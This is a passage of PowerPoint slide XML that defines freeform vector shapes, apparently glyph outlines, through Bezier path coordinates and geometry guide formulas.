                    <a:pt x="249" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="188"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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03" name="Freeform 944">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B74130C-A976-4F74-B75A-0E5EB28DB90F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId120"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3078163" y="2319338"/>
              <a:ext cx="65088" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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04" name="Freeform 945">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46BD7EAB-290E-40D9-B9D0-4AD16D5FB8D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId121"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3162301" y="2319338"/>
              <a:ext cx="80963" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 279 h 307"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 304 h 307"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 304 h 307"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 307"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 307"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 307"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 307"/>
                <a:gd name="T16" fmla="*/ 138 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 307"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 307"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 307"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 307"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 307"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 86 h 307"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 307"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 307 h 307"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 279 h 307"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 172 h 307"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 207 h 307"/>
                <a:gd name="T38" fmla="*/ 99 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 307"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 307"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 307"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 172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7" h="307">
                  <a:moveTo>
                    <a:pt x="160" y="279"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="297"/>
                    <a:pt x="160" y="304"/>
                    <a:pt x="180" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="304"/>
                    <a:pt x="237" y="304"/>
                    <a:pt x="237" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="274"/>
                    <a:pt x="224" y="274"/>
                    <a:pt x="217" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="131" y="30"/>
                    <a:pt x="138" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="94"/>
                    <a:pt x="123" y="86"/>
                    <a:pt x="102" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="86"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="259"/>
                    <a:pt x="45" y="307"/>
                    <a:pt x="98" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="307"/>
                    <a:pt x="146" y="294"/>
                    <a:pt x="160" y="279"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="207"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="235"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="99" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="241"/>
                    <a:pt x="34" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="149"/>
                    <a:pt x="69" y="117"/>
                    <a:pt x="104" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="160" y="145"/>
                    <a:pt x="160" y="17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05" name="Freeform 946">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B388E867-6F96-438E-8C8A-91CAC29925F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId122"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3267076" y="2317751"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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06" name="Freeform 947">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D2CD0F6-38D0-46C9-BED5-31A953992820}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId123"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3370263" y="2351088"/>
              <a:ext cx="22225" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 30 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 30 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="30" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="166"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="31" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="30" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="215"/>
                    <a:pt x="62" y="200"/>
                    <a:pt x="62" y="18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07" name="Freeform 948">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6A4A6C-7A0C-4292-BBCF-DA83ACE2D319}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId124"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3432176" y="2317751"/>
              <a:ext cx="79375" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 232"/>
                <a:gd name="T1" fmla="*/ 189 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 206 h 310"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 226 h 310"/>
                <a:gd name="T6" fmla="*/ 145 w 232"/>
                <a:gd name="T7" fmla="*/ 226 h 310"/>
                <a:gd name="T8" fmla="*/ 145 w 232"/>
                <a:gd name="T9" fmla="*/ 280 h 310"/>
                <a:gd name="T10" fmla="*/ 114 w 232"/>
                <a:gd name="T11" fmla="*/ 280 h 310"/>
                <a:gd name="T12" fmla="*/ 95 w 232"/>
                <a:gd name="T13" fmla="*/ 295 h 310"/>
                <a:gd name="T14" fmla="*/ 114 w 232"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 204 w 232"/>
                <a:gd name="T17" fmla="*/ 310 h 310"/>
                <a:gd name="T18" fmla="*/ 224 w 232"/>
                <a:gd name="T19" fmla="*/ 295 h 310"/>
                <a:gd name="T20" fmla="*/ 204 w 232"/>
                <a:gd name="T21" fmla="*/ 280 h 310"/>
                <a:gd name="T22" fmla="*/ 173 w 232"/>
                <a:gd name="T23" fmla="*/ 280 h 310"/>
                <a:gd name="T24" fmla="*/ 173 w 232"/>
                <a:gd name="T25" fmla="*/ 226 h 310"/>
                <a:gd name="T26" fmla="*/ 212 w 232"/>
                <a:gd name="T27" fmla="*/ 226 h 310"/>
                <a:gd name="T28" fmla="*/ 232 w 232"/>
                <a:gd name="T29" fmla="*/ 211 h 310"/>
                <a:gd name="T30" fmla="*/ 212 w 232"/>
                <a:gd name="T31" fmla="*/ 196 h 310"/>
                <a:gd name="T32" fmla="*/ 173 w 232"/>
                <a:gd name="T33" fmla="*/ 196 h 310"/>
                <a:gd name="T34" fmla="*/ 173 w 232"/>
                <a:gd name="T35" fmla="*/ 20 h 310"/>
                <a:gd name="T36" fmla="*/ 153 w 232"/>
                <a:gd name="T37" fmla="*/ 0 h 310"/>
                <a:gd name="T38" fmla="*/ 139 w 232"/>
                <a:gd name="T39" fmla="*/ 0 h 310"/>
                <a:gd name="T40" fmla="*/ 118 w 232"/>
                <a:gd name="T41" fmla="*/ 10 h 310"/>
                <a:gd name="T42" fmla="*/ 4 w 232"/>
                <a:gd name="T43" fmla="*/ 189 h 310"/>
                <a:gd name="T44" fmla="*/ 35 w 232"/>
                <a:gd name="T45" fmla="*/ 196 h 310"/>
                <a:gd name="T46" fmla="*/ 145 w 232"/>
                <a:gd name="T47" fmla="*/ 21 h 310"/>
                <a:gd name="T48" fmla="*/ 145 w 232"/>
                <a:gd name="T49" fmla="*/ 196 h 310"/>
                <a:gd name="T50" fmla="*/ 35 w 232"/>
                <a:gd name="T51" fmla="*/ 196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2" h="310">
                  <a:moveTo>
                    <a:pt x="4" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="4" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="145" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="280"/>
                    <a:pt x="95" y="280"/>
                    <a:pt x="95" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="310"/>
                    <a:pt x="107" y="310"/>
                    <a:pt x="114" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="204" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="310"/>
                    <a:pt x="224" y="310"/>
                    <a:pt x="224" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="280"/>
                    <a:pt x="212" y="280"/>
                    <a:pt x="204" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="232" y="226"/>
                    <a:pt x="232" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="196"/>
                    <a:pt x="220" y="196"/>
                    <a:pt x="212" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="145" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="196"/>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08" name="Freeform 949">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB7A2D9-6B77-4198-99C9-DA616AB5DD81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId125"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3524251" y="2316163"/>
              <a:ext cx="74613" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 217"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 206 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 197 w 217"/>
